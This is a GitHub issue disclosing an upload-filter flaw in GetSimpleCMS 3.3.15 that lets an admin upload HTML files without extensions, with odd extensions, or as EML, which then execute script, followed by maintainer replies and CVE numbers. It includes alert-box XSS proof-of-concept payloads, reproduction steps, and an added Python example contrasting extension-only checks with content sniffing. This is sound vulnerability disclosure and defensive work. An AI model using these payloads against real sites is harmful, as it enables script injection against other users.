GetSimpleCMS allows uploading some files that are able to execute HTML #1301

Open
Hexife opened this Issue Nov 14, 2018 · 2 comments

Hexife commented Nov 14, 2018

Brief of this vulnerability
GetSimpleCMS allows uploading files that are able to execute as HTML.

There are 3 types of HTML-executable files:

  • HTML file with no extension
  • HTML file with an uncommon extension (e.g. asdf)
  • HTML encoded as EML (triggered in IE only)
    (I also confirmed the SVG issue, but there was already an issue for it - #1292.)

Test Environment

  • Apache/2.4.18 (Debian)
  • PHP 5.6.38-2+ubuntu16.04.1+deb.sury.org+1 (cli)

Affected version
3.3.15

Payload

  • Move to http://[address]:[port]/[app_path]/admin/upload.php with admin credentials.

  • Upload the prepared malformed files:

    • HTML file with no extension
      • Filename - test

        <html><head><title>XSS</title></head><body><script>alert('xss')</script></body></html>

    • HTML file with an uncommon extension
      • Filename - test.asdf

        <html><head><title>XSS</title></head><body><script>alert('xss')</script></body></html>

    • HTML file encoded as EML
      • Filename - test.eml

        TESTEML
        Content-Type: text/html
        Content-Transfer-Encoding: quoted-printable

        XSS Test
        =3Cscript=3Ealert=281=29=3B=3C=2Fscript=3E

  • Click the uploaded file name, or
    move to http://[address]:[port]/[app_path]/data/uploads/[uploaded file].

  • Profit!

Reason for This Vulnerability

In admin/upload-uploadify.php, the third parameter of validate_safe_file is not present.

The function validate_safe_file is in admin/inc/security_functions.php, and its third parameter, mime, will be null.

As a result, the file filtering of validate_safe_file depends on extensions (it does not use the MIME type).

This allows uploading the three types of files that I introduced.
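The following is an added example, not code from GetSimpleCMS or from this report. It reconstructs the three payload files from the "Payload" section as byte strings and runs them through an extension-only check of the kind the "Reason for This Vulnerability" section describes, next to a hardened check that allowlists extensions and sniffs the leading bytes for HTML. The deny-list, the allowlist and the function names are assumptions; the report does not show validate_safe_file itself. It also adds a fourth constructed file, a .jpg whose body carries a script tag, to show the content sniff catching a polyglot that no extension rule would stop, which goes beyond the three cases in the report.

```python
"""Added illustration (not GetSimpleCMS code): an extension-only upload
filter versus an extension allowlist combined with HTML content sniffing.
All lists and function names below are assumptions made for this example."""
import os
import re

# The payloads from the report, reconstructed here as constructed sample
# input. The EML one mirrors the quoted-printable body quoted in the issue.
HTML_XSS = (b"<html><head><title>XSS</title></head>"
            b"<body><script>alert('xss')</script></body></html>")
EML_XSS = (b"TESTEML\r\n"
           b"Content-Type: text/html\r\n"
           b"Content-Transfer-Encoding: quoted-printable\r\n"
           b"\r\n"
           b"XSS Test\r\n"
           b"=3Cscript=3Ealert=281=29=3B=3C=2Fscript=3E\r\n")

UPLOADS = {
    "test": HTML_XSS,          # case 1: no extension
    "test.asdf": HTML_XSS,     # case 2: uncommon extension
    "test.eml": EML_XSS,       # case 3: HTML carried as a mail body
    # Extra constructed case: JPEG magic bytes followed by markup (polyglot).
    "inline.jpg": b"\xff\xd8\xff\xe0" + b"<script>alert(1)</script>",
    # Benign control: JPEG magic bytes and padding only.
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
}

# Assumed deny-list standing in for an extension-only check.
DENIED_EXTENSIONS = {"php", "phtml", "php3", "html", "htm", "js", "svg"}

# Assumed allowlist for the hardened check.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "zip"}

# Tags a browser treats as a document when it sniffs the body.
HTML_MARKERS = re.compile(
    rb"<\s*(!doctype\s+html|html|head|body|script|iframe|svg|object|embed)\b",
    re.I)
# A mail header that makes IE render the body as HTML (report case 3).
EML_HTML_MARKER = re.compile(rb"^content-type:\s*text/html", re.I | re.M)


def extension_of(filename):
    """Return the lowercase extension, or '' when the name has none."""
    _root, ext = os.path.splitext(filename)
    return ext.lstrip(".").lower()


def extension_only_check(filename):
    """Extension-only filter: rejects only names whose extension is denied.
    A missing or unknown extension is never on the list, so it passes."""
    return extension_of(filename) not in DENIED_EXTENSIONS


def looks_like_html(data):
    """Content sniff over the leading bytes: HTML tags or a text/html
    mail header mean a browser may render this as a document."""
    head = data[:1024]
    return bool(HTML_MARKERS.search(head) or EML_HTML_MARKER.search(head))


def hardened_check(filename, data):
    """Accept only allowlisted extensions AND bodies that do not sniff as HTML."""
    if extension_of(filename) not in ALLOWED_EXTENSIONS:
        return False
    return not looks_like_html(data)


def run_both(uploads=UPLOADS):
    """Map filename -> (extension_only_result, hardened_result)."""
    return {name: (extension_only_check(name), hardened_check(name, data))
            for name, data in uploads.items()}


if __name__ == "__main__":
    for name, (loose, strict) in run_both().items():
        print(f"{name:11s} extension-only={'accept' if loose else 'reject':6s} "
              f"hardened={'accept' if strict else 'reject'}")
```

Running it shows the three report payloads and the polyglot accepted by the extension-only check and rejected by the hardened one, with only photo.jpg passing both. Independently of the upload filter, the uploads directory should be served with X-Content-Type-Options: nosniff and a Content-Disposition: attachment header, so that whatever does get through is downloaded rather than rendered.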

tablatronix (Member) commented Nov 15, 2018

It looks like this was supposed to do mime checking and was removed or never implemented. Interesting.

Hexife commented Nov 22, 2018

I got the CVEs for these vulnerabilities - CVE-2018-19420, CVE-2018-19421.
